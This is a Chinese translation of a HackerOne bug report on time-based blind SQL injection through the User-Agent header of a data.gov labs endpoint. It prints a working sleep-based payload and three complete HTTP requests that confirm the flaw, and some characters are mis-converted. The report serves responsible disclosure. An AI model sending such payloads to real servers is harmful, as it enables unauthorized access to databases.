SQL注入之User-Agent注入

漏洞信息

披露者：harisec
危害程度：高危
漏洞类型：sql注入

漏洞介绍

经过访问：
https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent头在中进行SQL注入
我没有从数据库中提取任何数据，我已经使用sleep函数 SQL查询确认了该漏洞。该命令与算术操做相结合，将致使服务器响应不一样的时间取决于算术运算的结果。
例如，将该值设置：
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
到User-Agent头部将致使服务器延迟响应25（5×5）秒。
要重现，请发送如下HTTPS请求：

GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR' X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

服务器将在25（5 5）秒后响应-与User-Agent:标头的值相同。
如今，让服务器当即响应。咱们将发送值sleep（5 5 * 0），它等于0。

GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'
X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

服务器当即响应为5 5 0 = 0。
让咱们经过另外一个请求进行确认：

GET /dashboard/datagov/csv_to_json HTTP/1.1
Referer: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'
X-Forwarded-For: 1
X-Requested-With: XMLHttpRequest
Host: labs.data.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

此次，有效负载包含6 * 6-30，等于6。服务器在6秒钟后响应。
这些只是我尝试确认此问题的带有各类算术运算的SQL查询中的一些。

漏洞影响

***者能够操纵发送到MySQL数据库的SQL语句，并注入恶意SQL语句。***者能够更改对数据库执行的SQL语句的命令。

翻译自hackerone
免责申明：本文由互联网整理翻译而来,仅供我的学习参考,若有侵权,请联系咱们,告知删除。